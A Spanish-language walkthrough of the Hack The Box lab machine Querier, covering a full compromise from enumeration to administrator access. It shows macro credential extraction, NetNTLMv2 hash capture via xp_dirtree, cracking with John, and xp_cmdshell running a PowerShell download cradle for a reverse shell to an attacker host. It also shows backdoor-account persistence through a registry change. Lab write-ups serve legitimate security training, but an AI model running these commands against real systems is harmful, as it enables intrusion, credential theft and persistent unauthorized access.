Maquina Retirada Querier de Hack The Box (Necesario VIP)
Published on 04 Jan 2022
Querier ~ Hack The Box
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allports 10.10.10.125 "
Procedemos con el siguiente escaneo de Nmap
#PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-01-26T17:55:09
|_Not valid after: 2052-01-26T17:55:09
|_ssl-date: 2022-01-26T18:23:29+00:00; +17m07s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 17m06s, deviation: 0s, median: 17m06s
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-26T18:23:25
|_ start_date: N/A
Procedemos a enumera el servicio por SMB
# smbmap -H 10.10.10.125 -u null
[+] Guest session IP: 10.10.10.125:445 Name: 10.10.10.125
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Reports READ ONLY
Procedemos a Conectarnos al Recurso llamado Reports
# smbclient //10.10.10.125/Reports -u null 1 ⚙
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jan 29 00:23:48 2019
.. D 0 Tue Jan 29 00:23:48 2019
Currency Volume Report.xlsm A 12229 Sun Jan 27 23:21:34 2019
6469119 blocks of size 4096. 1589814 blocks available
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (22,9 KiloBytes/sec) (average 22,9 KiloBytes/sec)
smb: \> exit
El archivo tiene formato .xlsm podria ser una archi excell ??
Probamos a sacar informacion del archivo
# ls
Currency_Volume_Report.xlsm
# file Currency_Volume_Report.xlsm
Currency_Volume_Report.xlsm: Microsoft Excel 2007+
Olevba - Excell Files
Para analizar archivos Excell tenemos una herramienta llamada olevba con la que podemos listar informacion
# olevba Currency_Volume_Report.xlsm 1 ⚙
olevba 0.56.1 on Python 3.9.8 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency_Volume_Report.xlsm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
macro to pull data for client volume reports
further testing required
Private Sub Connect()
Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume; || Uid=reporting;Pwd=PcwTWTHRwryjc$c6 || "
conn.ConnectionTimeout = 10
conn.Open
If conn.State = adStateOpen Then
' MsgBox "connection successful"
'Set rs = conn.Execute("SELECT * @@version;")
Set rs = conn.Execute("SELECT * FROM volume;")
Sheets(1).Range("A1").CopyFromRecordset rs
rs.Close
End If
End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open |May open a file |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+
Encontramos un usario y su Contraseña
reporting:PcwTWTHRwryjc$c6
Crackmapexec
Procedemos a validarla con Cracmapexec
# crackmapexec smb 10.10.10.125 -u reporting -p 'PcwTWTHRwryjc$c6'
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) "(domain:HTB.LOCAL)"(signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [-] HTB.LOCAL\reporting:PcwTWTHRwryjc$c6 STATUS_NO_LOGON_SERVERS
Vemos que esta probando la contraseña a nivel de dominio Activo, pero nos interesa hacerlo para el dominio WORKGROUP
# crackmapexec smb 10.10.10.125 -u reporting -p 'PcwTWTHRwryjc$c6' -d WORKGROUP
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:WORKGROUP) (signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [+] WORKGROUP\reporting:PcwTWTHRwryjc$c6
Vemos como para el dominio local si que tenemos una contraseña valida. Antes que nada vamos a seguir mirando puertos abiertos interesantes para enumerar un poco por encima.
Mssqlclient.py
Aqui hay que tener cuidado ya que como habiamos visto con Crackmapexec las crendeciales eran para el GRUPO de TRABAJO/WORKGROUP aqui en la conexion de autenticacion tendriamos que indicarlo con el parametro -windows-auth sino no nos funcionara.
# mssqlclient.py 'WORKGROUP/reporting:PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth 1 ⚙
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Xp_dirtree
Usamos la funcion de mysql-server por la cual hacemos una peticion a un recurso local o externo. Permitiendonos asi postear un recurso compartido a nivel de red para interceptar el Hash Net NTLMV2 que sirva para crackearlo, y si la contraseña es debil, se tenso.
Hacemos la peticion a nivel de Red para inteceptar el Hash
SQL> xp_dirtree "//10.10.16.3/caca"
subdirectory depth
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------
SQL>
Recurso Compartido de Nuestro Lado Attacante
# impacket-smbserver smbFolder $(pwd) -smb2support
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.125,49675)
[*] AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
[*] User QUERIER\mssql-svc authenticated successfully
[*] "mssql-svc::QUERIER:aaaaaaaaaaaaaaaa:0642e72a441030d47a763c00c904aaeb:010100000000000080538e39e112d8019cd5667bcfcfd83e0000000001001000530068004a004e00760064006b00670003001000530068004a004e00760064006b00670002001000530056004f00740055004a0070007a0004001000530056004f00740055004a0070007a000700080080538e39e112d801060004000200000008003000300000000000000000000000003000003a2a8b8bb974a03e4d78308603f3c73b02c7f94cb7f3041d9dc5376f9f96f69d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003300000000000000000000000000 "
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found caca
[-] SMB2_TREE_CONNECT not found caca
[*] AUTHENTICATE_MESSAGE (\,QUERIER)
[*] User QUERIER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
Procedemos a copiarnos el Hash a un archivito
Procedemos a usar la herramienta John
# john --wordlist=/usr/share/wordlists/rockyou.txt Hash_NetNtlmV2 1 ⚙
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
"corporate568 (mssql-svc)"
1g 0:00:00:01 DONE (2022-01-26 19:22) 0.5780g/s 5180Kp/s 5180Kc/s 5180KC/s correemilio..coreyny
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Nuevas credenciales
mssql-svc:corporate568
Procedemos a Validar las Credenciales obtenidas con Crackmapexec
# crackmapexec smb 10.10.10.125 -u mssql-svc -p 'corporate568' -d WORKGROUP
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:WORKGROUP) (signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [+] WORKGROUP\mssql-svc:corporate568
# crackmapexec smb 10.10.10.125 -u mssql-svc -p 'corporate568' -d WORKGROUP 1 ⚙
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:WORKGROUP) (signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [+] WORKGROUP\mssql-svc:corporate568
└─# crackmapexec winrm 10.10.10.125 -u mssql-svc -p 'corporate568' -d WORKGROUP 1 ⚙
WINRM 10.10.10.125 5985 10.10.10.125 [*] http://10.10.10.125:5985/wsman
WINRM 10.10.10.125 5985 10.10.10.125 [-] WORKGROUP\mssql-svc:corporate568
Vemos que aun con las dos credenciales no tenemos acceso por winrm Volvemos a Autenticarnos por mysql-service
Mssclient.py - Xp_CmdShell
Ejecucion de comandos atraves de la opcion XP_CMDSHELL en mysql-service
# mssqlclient.py 'WORKGROUP/mssql-svc:corporate568'@10.10.10.125 -windows-auth 130 ⨯
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
### Paso 1 - Ver el error
SQL> xp_cmdshell "whoami"
[-] ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
### Paso 2 - Reconfigurar las opciones avanzadas
SQL> sp_configure "show advanced options", 1
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
### Paso 3 - Intento Erroneo de Reconfigurar la opcion XP_CMDSHELL
SQL> sp_configure "xp_cmdshell", 1
[-] ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
### Paso 4 - Re Seteamos el habilitar que se muestren las opciones avanzadas
SQL> sp_configure "show advanced", 1
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
### Paso 5 - Configuramos la opcion xp_cmdShell para que este habilitada
SQL> sp_configure "xp_cmdshell", 1
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
###Paso 6 - R C E - Ejecucion de Comandos
SQL> xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
querier\mssql-svc
NULL
aSQL>
Procedemos a Ganar acceso a la maquina Victima con el uso de Nishang para ello vamos a postear un archivo del
repositorio de nishan que se va a ejecutar en la maquina victima atraves de una peticion via web a un servidor que nos vamos a estar
compartiendo con python3 desde nuestra maquina atacante con nuestro archivo malicioso Invoke-TCP-Powershell.ps1
Intrusion con PowerShell - User mssql-svc
Preparamos el comando listo para ejecutarlo con la utilidad XP_CMDSHELL
SQL> xp_cmdshell "powershell IEX(New-Object Net.WebClient).downloadString(\"http://10.10.16.3/PST.ps1\")"
Ponemos nuestro servidor con Python3 y nuestro archivo malicioso renombrado PST.ps1 y habiendole indicado al final del mismo la intruccion que quemos que nos cargue para que conforme se interprete llame a la funcion que le indicamos al final
" Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port 443 "
Recibimos correctamente la peticion al recurso en nuestro servidor
# python3 -m http.server 80 1 ⚙
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.125 - - [26/Jan/2022 19:49:10] "GET /PST.ps1 HTTP/1.1" 200 -
Y habiendo preparado una session a la escucha con nc por el puerto indicado
# rlwrap nc -vlnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49677
Windows PowerShell running as user mssql-svc on QUERIER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>
whoami
querier\mssql-svc
Privesc - PowerUp.ps1 - Enumeracion Windows
Enumeramos un poco, al ver que estamos en un proceso con la misma arquitectura de la maquina victima procedemos a Postear nuestro Script PowerUp.ps1
[Environment]::Is64BitOperatingSystem
True
[Environment]::Is64BitProcess
True
Maquina Vitctima
IEX(New-Object Net.WebClient).downloadString("http://10.10.16.3/PowerUp.ps1")
Output de PowerUp.ps1
Privilege : SeImpersonatePrivilege
Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2196
ProcessId : 2960
Name : 2960
Check : Process Token Privileges
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
Name : UsoSvc
Check : Modifiable Services
ModifiablePath : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
UnattendPath : C:\Windows\Panther\Unattend.xml
Name : C:\Windows\Panther\Unattend.xml
Check : Unattended Install Files
Changed : {2019-01-28 23:12:48}
UserNames : "{Administrator} "
NewName : [BLANK]
Passwords : " {MyUnclesAreMarioAndLuigi!!1!} "
File : C:\ProgramData\Microsoft\Group
Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check : Cached GPP Files
Maquina Atacante - Recibimos la Peticion de Red
# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.125 - - [26/Jan/2022 20:06:27] "GET /PowerUp.ps1 HTTP/1.1" 200 -
Encontramos una Contraseña para el Usuario Administrator
administrator:MyUnclesAreMarioAndLuigi!!1!
Procedemos a Comprobarlas con Crackmapexec para SMB y Winrm
# Aqui no le ponemos el Domino -WORKGROUP y la pass no es valida
# crackmapexec smb 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [-] HTB.LOCAL\administrator:MyUnclesAreMarioAndLuigi!!1! STATUS_NO_LOGON_SERVERS
# Aqui le indicamos el dominio -d WORKGROUP
# crackmapexec smb 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!' -d WORKGROUP
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:WORKGROUP) (signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [+] WORKGROUP\administrator:MyUnclesAreMarioAndLuigi!!1! (Pwn3d!)
# Comprobacion para WINRM
# crackmapexec winrm 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!' -d WORKGROUP 1 ⚙
WINRM 10.10.10.125 5985 10.10.10.125 [*] http://10.10.10.125:5985/wsman
WINRM 10.10.10.125 5985 10.10.10.125 [+] WORKGROUP\administrator:MyUnclesAreMarioAndLuigi!!1! (Pwn3d!)
Vale pues procedemos a conectarnos a la maquina con la herramienta evil-winrm
# evil-winrm -i 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Sacamos la Flag de Root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
b19c3794f786a1fdxxxxxxxxxxxxxxxx
Persistencia a nivel de Equipo una Vez logrado ser Administrador
Forma 1 – Crear un nuevo usuario y hacerlo administrador
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user paco paco123$ /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Documents> net localgroup paco administrators /add
net.exe : System error 1376 has occurred.
+ CategoryInfo : NotSpecified: (System error 1376 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
The specified local group does not exist.
*Evil-WinRM* PS C:\Users\Administrator\Documents> Add-LocalGroupMember -Group "Administrators" -Member "paco"
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user paco
User name paco
Full Name
Comment
Users comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/26/2022 7:38:06 PM
Password expires 3/9/2022 7:38:06 PM
Password changeable 1/27/2022 7:38:06 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships "*Administrators" *Users
Global Group memberships *None
The command completed successfully.
Comprobacion con Crackmapexec para ver si tendriamos el usuario creado y con (Pwned)
# crackmapexec smb 10.10.10.125 -u "paco" -p 'paco123$' -d WORKGROUP
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:WORKGROUP) (signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [+] WORKGROUP\paco:paco123$
Vemos que la pass es validad pero no tendriamos posibilidad de conectarnos al no tener el (Pwned)
Puede ocurrir que tengamos credenciales de administrador, pero no tengamos la capacidad de ejecutar comandos.
Esto puede ocurrir porque LocalAccountTokenFilterPolicy es un filtro que previene que se usen privilegios elevados a través de la red.
Solo aplicaria para las Cuentas Administrativas Locales, No afectan a las Cuentas de Dominios
Para deshabilitar el LocalAccountTokenFilterPolicy, debemos retocar el siguiente registro
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system"
Procemos a hacerlo
*Evil-WinRM* PS C:\Users\Administrator\Documents> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
The operation completed successfully.
Recomprobamos con la herramienta Crackmapexec
# crackmapexec smb 10.10.10.125 -u "paco" -p 'paco123$' -d WORKGROUP
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:WORKGROUP) (signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [+] WORKGROUP\paco:paco123$ (Pwn3d!)
Post Explotacion atraves de Usuario Nuevo Creado Paco
Usando la herramienta psexec.py
# psexec.py 'WORKGROUP/paco:paco123$'@10.10.10.125
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file pSzSoFOo.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service SWYm on 10.10.10.125.....
[*] Starting service SWYm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Maquina Rooteda - Surf3rH4ck - K0H4ck